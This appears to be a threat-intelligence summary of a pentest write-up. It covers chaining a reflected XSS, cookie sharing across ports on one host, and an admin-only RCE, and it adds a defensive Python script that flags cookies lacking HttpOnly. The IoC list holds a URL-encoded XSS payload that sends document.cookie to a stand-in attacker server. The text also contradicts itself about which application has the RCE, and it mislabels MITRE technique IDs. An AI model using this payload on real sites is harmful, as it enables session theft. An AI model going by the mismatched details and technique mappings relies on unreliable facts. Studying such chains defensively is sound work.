
Summary:
This article discusses how a security consultant uncovered a critical vulnerability by chaining multiple findings across three applications running on the same hostname. A misconfiguration initially rated as informational led to administrative access and remote code execution. The case highlights the danger of seemingly benign vulnerabilities when they are combined.
#WebSecurity #ExploitChain #VulnerabilityAssessment
Keypoints:
- Security consultant identified vulnerabilities across three applications running on the same hostname but different ports.
- Application A was vulnerable to Reflected XSS but couldn’t be exploited for session hijacking due to HttpOnly flags on cookies.
- Application B had a high-severity RCE vulnerability requiring admin access and exposed sensitive Spring Boot actuator endpoints.
- Application C supported both Authorization Header and session-based authentication, making it a target for session hijacking.
- A weak configuration, cross-application cookie exposure, was identified: because browsers scope cookies by hostname and not by port, cookies set by one application were also sent to, and visible from, the other applications on the same host.
- Session hijacking was possible due to the absence of the HttpOnly flag on Application C’s JSESSIONID cookie.
- Chaining vulnerabilities escalated the severity from informational to critical, allowing exploitation of RCE without admin privileges.
- The engagement demonstrated the risk of misconfigurations leading to significant security threats.
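To check for the cross-application cookie exposure described in the findings above, here is an added example (not code from the NetSPI post) that parses Set-Cookie headers observed from several applications on one host and reports the cookies that script on any same-host origin could read; the hostnames, ports and cookie names are constructed.

```python
from urllib.parse import urlsplit

# Constructed observations: one hostname, three ports (assumed names).
# Browsers key the cookie jar on the host and path, never the port,
# so all three Set-Cookie headers land in one shared jar.
SAMPLE = [
    ("https://example.com:1111/", "app_a=1; Path=/; HttpOnly; Secure"),
    ("https://example.com:2222/", "actuator_session=2; Path=/; HttpOnly"),
    ("https://example.com:3333/", "JSESSIONID=3; Path=/"),
]


def parse_set_cookie(header):
    """Split a Set-Cookie header into (name, value, {attribute: value})."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        # Flag attributes (HttpOnly, Secure) carry no value; store True.
        attrs[key.strip().lower()] = val.strip() if val else True
    return name.strip(), value, attrs


def cookie_jar_by_host(observations):
    """Group cookie names by hostname: the scope the browser actually uses."""
    jar = {}
    for url, header in observations:
        host = urlsplit(url).hostname
        name, _, _ = parse_set_cookie(header)
        jar.setdefault(host, set()).add(name)
    return jar


def script_readable_cookies(observations):
    """Cookies that document.cookie exposes to any same-host origin.

    Only HttpOnly blocks script access; Secure and Path do not help
    against an XSS on a sibling port. A Domain attribute widens the
    scope further but is not needed for the same-host case shown here.
    """
    exposed = []
    for url, header in observations:
        name, _, attrs = parse_set_cookie(header)
        if attrs.get("httponly") is True:
            continue
        exposed.append({"host": urlsplit(url).hostname, "cookie": name,
                        "path": attrs.get("path", "/"), "set_by": url})
    return exposed
```

Running it on the sample flags only `JSESSIONID`, the one cookie set without HttpOnly, as readable from every port on the host.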
MITRE Techniques:
- Exploitation for Client Execution (T1203): Leveraged XSS vulnerability in Application A to hijack session cookie from Application C.
- Remote Code Execution (T1203): Exploited RCE vulnerability in Application C after gaining administrative access through session hijacking.
- Cross-Site Scripting (T1068): Used XSS in Application A to access sensitive cookies from Application C.
IoC:
- [domain] example[.]com
- [url] https://example[.]com:1111?id=setTimeout%28%28%29%3d>%7bfetch%28%27https%3a%2f%2fmy-malicious-server.com%3fcookie%3d%27%2bdocument%2ecookie%29%2ethen%28%29%7d%2c5000%29
- [url] https://my-malicious-server.com
Full Research: https://www.netspi.com/blog/technical-blog/web-application-pentesting/uncovering-a-critical-vulnerability-through-chained-findings/